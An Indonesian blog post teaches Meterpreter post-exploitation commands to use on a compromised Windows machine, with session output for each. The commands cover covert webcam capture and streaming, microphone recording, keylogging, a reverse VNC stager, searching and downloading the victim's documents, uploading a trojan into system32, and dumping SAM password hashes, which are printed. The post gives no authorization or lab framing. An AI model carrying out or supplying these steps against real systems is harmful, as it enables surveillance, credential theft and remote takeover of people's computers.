Pada postingan kali ini saya akan membagikan beberapa perintah-perintah yang dapat dijalankan ketika kita sudah mendapatkan sesi meterpreter dari target yang kita exploit.
Kebetulan kemarin ada yang bertanya juga apa yang bisa kita lakukan jika sudah mendapat sesi meterpreter, jika kita tau perintah-perintahnya banyak yang bisa dilakukan, seperti menjalankan program yang ada di sistem target, mengirim file atau mengambil file-file yang ada di sistem target. nah di bawah ini akan saya berikan beberapa contoh perintah - perintah dasar meterpreter di metasploit

help
Perintah ini digunakan untuk melihat semua menu meterpreter
meterpreter > help

Core Commands
=============

    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session
    bgkill                    Kills a background meterpreter script
background
Perintah ini digunakan untuk mengirimkan sesi meterpreter berjalan sebagai background
meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > 
sysinfo
Perintah ini digunakan untuk melihat informasi sistem target
meterpreter > sysinfo
Computer        : SAMSUNG
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 4
Meterpreter     : x86/win32
run vnc
Perintah ini digunakan untuk remote sistem target
meterpreter > run vnc
[*] Creating a VNC reverse tcp stager: LHOST=192.168.1.100 LPORT=4545
[*] Running payload handler
[*] VNC stager executable 73802 bytes long
[*] Uploaded the VNC agent to C:\Users\Samsung\AppData\Local\Temp\sccHTQrAIy.exe (must be deleted manually)
[*] Executing the VNC agent with endpoint 192.168.1.100:4545...
run vnc

webcam_list
Perintah ini digunakan untuk melihat list webcam yang ada
meterpreter > webcam_list
1: ManyCam Virtual Webcam
2: HP Webcam-50
meterpreter > 
webcam_snap
Perintah ini digunakan untuk mengambil gambar dari webcam
meterpreter > webcam_snap
[*] Starting...
[+] Got frame
[*] Stopped
Webcam shot saved to: /root/PZegxMLF.jpeg
meterpreter > 
webcam_stream
Perintah ini digunakan untuk streaming secara langsung dari webcam target
meterpreter > webcam_stream
[*] Starting...
[*] Preparing player...
[*] Opening player at: GHqixCls.html
[*] Streaming...
record_mic
Perintah ini digunkan untuk mengambil rekaman suara dari microphone target, tambahkan opsi -d utuk menentukan interfal
meterpreter > record_mic -d 10
[*] Starting...
[*] Stopped
Audio saved to: /root/UqxrMpys.wav
meterpreter > 
run keylogrecorder
Perintah ini digunakan untuk merekam aktifitas keyboard pada sistem target, tekan Ctrl+C untuke berhenti

meterpreter > run keylogrecorder
[*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /root/.msf4/logs/scripts/keylogrecorder/192.168.1.103_20160229.0841.txt
[*] Recording 
^C[*] Saving last few keystrokes
[*] Interrupt 
[*] Stopping keystroke sniffer...
meterpreter > 
geteuid
perintah ini digunakan untuk melihat user server yang sedang berjalan
meterpreter > getuid
Server username: Samsung\Samsung
meterpreter > 
getsid
Perintah ini digunakan untuk mendapatkan SID dari user server yang sedang berjalan
meterpreter > getsid
Server SID: S-1-5-21-341670393-1752858153-726497755-1000
meterpreter > 
Search
Perintah untuk mencari sebuah file yang ada di sistem target, gunakan opsi -f untuk mencari file dengan format tertentu
meterpreter > search -f .pdf
Found 50 results...
    C:\Users\Samsung\Documents\CV.PDF (136731 bytes)
    C:\Users\Samsung\DocumentsHowTo.pdf (570012 bytes)
    C:\Users\Samsung\Documents\pertemuan-04-klasifikasi-jaringan-komputer-compatibility-mode.pdf (149072 bytes)
    C:\Users\Samsung\Documents\TUTORIAL VERIFIKASI PIN ADSENSE.pdf (1170899 bytes)
'pwd' dan 'cd'
pwd digunakan untuk melihat dimana letak kita berada di direktory target, dan cd untuk masuk ke sebuah direktory
meterpreter > pwd
C:\
meterpreter > cd Users
meterpreter > pwd
C:\Users
meterpreter > 
ls 
Sama dengan perintah pada terminal linux, ini digunakan untuk melihat list dari suatu direktory
meterpreter > ls
Listing: C:\Users\Samsung\Documents
======================================

Mode              Size     Type  Last modified              Name
----              ----     ----  -------------              ----
40777/rwxrwxrwx   0        dir   2016-02-09 17:41:36 +0700  Bluetooth Folder
100666/rw-rw-rw-  136731   fil   2015-11-24 03:55:43 +0700  CV.PDF
100666/rw-rw-rw-  1992     fil   2016-02-03 17:26:41 +0700  Default.rdp
100666/rw-rw-rw-  73216    fil   2016-01-16 17:22:29 +0700  Drawing1 FLOW EGA.vsd
100666/rw-rw-rw-  570012   fil   2015-12-02 17:39:08 +0700  HowTo.pdf
100666/rw-rw-rw-  1170899  fil   2015-12-14 19:50:58 +0700  TUTORIAL VERIFIKASI PIN ADSENSE.pdf
100666/rw-rw-rw-  8251365  fil   2015-11-23 14:11:54 +0700  Untitled.pdf
40777/rwxrwxrwx   0        dir   2015-11-23 11:09:39 +0700  penggajian_Taruna_Karya
100666/rw-rw-rw-  149072   fil   2015-12-06 21:53:04 +0700  pertemuan-04-klasifikasi-jaringan-komputer-compatibility-mode.pdf
100666/rw-rw-rw-  20505    fil   2016-01-12 14:56:55 +0700  recruitingindo511.docx

meterpreter > 
download
Perintah ini digunakan untuk mengambil file dari sistem target
meterpreter > download Default.rdp /root/Desktop/
[*] downloading: Default.rdp -> /root/Desktop/Default.rdp
[*] download   : Default.rdp -> /root/Desktop/Default.rdp
meterpreter > 
/root/Desktop merupakan letak dimana file akan disimpan

upload
Perintah ini digunakan untuk mengirim sebuah file ke sistem target, dengan direktory yang ditetukan
meterpreter > upload trojan.exe c:\\windows\\system32
[*] uploading  : trojan.exe -> c:\windows\system32
[*] uploaded   : trojan.exe -> c:\windows\system32\trojan.exe
meterpreter > 
cat
Sama seperti perintah umumnya pada linux, ini digunakan untuk menampilkan isi dari sebuah file
meterpreter > cat
Usage: cat file
meterpreter > cat Anherr.txt

Perintah Perintah dasar Meterpreter

by Anherr Blog's

meterpreter > 
mkdir
Perintah ini digunakan untuk membuat sebuah folder
meterpreter > mkdir Anherr
Creating directory: Anherr
meterpreter >  
Kita juga dapat menggunkan peritah
cp untuk mengcopy file
rm untuk menghapus file
rmdir untuk menghapus suatu direktory

ipconfig
Perintah ini digunakan untuk meliha ip target secara keseluruhan
meterpreter > ipconfig

Interface  1
============
Name         : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU          : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff


Interface 11
============
Name         : Qualcomm Atheros AR9485 802.11b/g/n WiFi Adapter
Hardware MAC : 55:7d:68:15:dd:ef
MTU          : 1500
IPv4 Address : 192.168.1.103
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::cdb0:307a:4cdc:71e4
IPv6 Netmask : ffff:ffff:ffff:ffff::
netstat
Perintah ini digunakan untuk menampilkan koneklsi jaringan pada sistem target
meterpreter > netstat 

Connection list
===============

Proto  Local address                    Remote address        State        User  Inode  PID/Program name
    -----  -------------                    --------------        -----        ----  -----  ----------------
tcp    0.0.0.0:135                      0.0.0.0:*             LISTEN       0     0      808/svchost.exe
tcp    0.0.0.0:445                      0.0.0.0:*             LISTEN       0     0      4/System
tcp    0.0.0.0:49152                    0.0.0.0:*             LISTEN       0     0      480/wininit.exe
tcp    0.0.0.0:49153                    0.0.0.0:*             LISTEN       0     0      904/svchost.exe
tcp    0.0.0.0:49154                    0.0.0.0:*             LISTEN       0     0      984/svchost.exe
tcp    0.0.0.0:49155                    0.0.0.0:*             LISTEN       0     0      608/services.exe
ps
Perintah ini digunakan untuk meliha list prosses yang sedang berjalan pada target
meterpreter > ps

Process list
============

 PID   Name                       Arch  Session  User                   Path
 ---   ----                       ----  -------  ----                   ----
 0     [System Process]                                                 
 4     System                                                           
 276   smss.exe                                                         
 376   Ath_CoexAgent.exe                                                                
 2968  taskhost.exe               x86   1        Samsung\Samsung  C:\Windows\system32\taskhost.exe
 2976  dwm.exe                    x86   1        Samsung\Samsung  C:\Windows\system32\Dwm.exe
 3024  explorer.exe               x86   1        Samsung\Samsung  C:\Windows\Explorer.EXE
migrate
Perintah ini digunakan untuk berpindah ke prosses yang lain
meterpreter > migrate 3024
[*] Migrating from 1192 to 3024...
[*] Migration completed successfully.
meterpreter > 
execute
Perintah untuk mengeksekusi, contoh untuk menjalankan cmd.exe
meterpreter > execute -f cmd.exe
Process 316 created.
meterpreter > 
shell
Perintah ini digunakan untuk mendapatkan shell dari sistem target, layaknya Command Prompt
meterpreter > shell
Process 3456 created.
Channel 3 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>
hashdump
Perintah ini digunakan untuk dump database SAM
meterpreter > run post/windows/gather/hashdump 

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 8528c78df7ff55040196a9b670f114b6...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...

Administrator:500:b512c1f3a8c0e7241aa818381e4e751b:1891f4775f676d4d10c09c1225a5c0a3:::
dook:1004:81cbcef8a9af93bbaad3b435b51404ee:231cbdae13ed5abd30ac94ddeb3cf52d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:9cac9c4683494017a0f5cad22110dbdc:31dcf7f8f9a6b5f69b9fd01502e6261e:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:36547c5a8a3de7d422a026e51097ccc9:::
victim:1003:81cbcea8a9af93bbaad3b435b51404ee:561cbdae13ed5abd30aa94ddeb3cf52d:::
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\>
Itulah beberapa contoh dari perintah-perintah meterpreter di metasploit, sebetulnya masih ada lagi namun akan banyak jika ditulis semua, hehe , silahkan ketik help pada meterpreter untuk melihat semua list yang ada
Cukup itu dulu yang dapat saya bagikan kali ini , semoga bermanfaat
sumber www.offensive-security.com

Posting Komentar

 
Top